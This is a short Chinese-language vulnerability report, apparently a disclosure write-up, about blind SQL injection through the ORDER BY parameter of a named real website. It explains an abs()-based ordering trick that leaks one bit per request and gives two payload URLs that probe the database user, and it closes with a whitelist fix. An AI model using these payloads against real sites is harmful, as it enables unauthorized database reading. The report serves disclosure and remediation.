基于order by内容的盲注
详细说明：
对http://active.zol.com.cn/diy/bisai.php?mont_h=2009-05&id=12&type=15&order=zj_vote+desc 做安全检测。
尝试数值型注入未果。
不过，看到zj_vote+desc,想到这里也许能利用。
用工具扫它没发现注入。因为mysql的union前不能带order by。
但是order by里的内容是不是就没法注入了？
我不死心啊。
做了一些尝试，发现order by是可以盲注的。
这种方式依赖数据库结果中必须存在一个已知存在不一样数值的列。
不过，既然程序里order by那个字段了，那么那个字段理论上肯定有多种值的。比如本例中的zj_vote字段.
 
漏洞证明：

看排序。236和239数值相差3，我构造一个abs(zj_vote-237-(expr)) asc.
(expr)为假时，(239-237-0)=2,(236-237-0)=1,236排前面,
(expr)为真时，(239-237-1)=1,(236-237-1)=2,239排前面,
你也许会说，你这个236和239相差是3，当然简单了。如果相差2呢？
比如236和238怎么办？
不卖关子了，直接告诉你吧，他不是相差2么，你可以用abs(zj_vote-236-(expr)*3)啊
 
http://active.zol.com.cn/diy/bisai.php?mont_h=2009-05&id=12&type=15&order=abs(zj_vote-237-(length(user())>20))+asc
 

 
 
http://active.zol.com.cn/diy/bisai.php?mont_h=2009-05&id=12&type=15&order=abs(zj_vote-237-(length(user())=20))+asc
 
 
 
 
修复方案：

做一个允许的排序方式组合的数组，排序方式传排序方式的数组下标就可以了。
想直接传字段也可以，检查一下那个排序方式是否在数组里，不是就用默认排序方式。也就安全了。

作者 小雨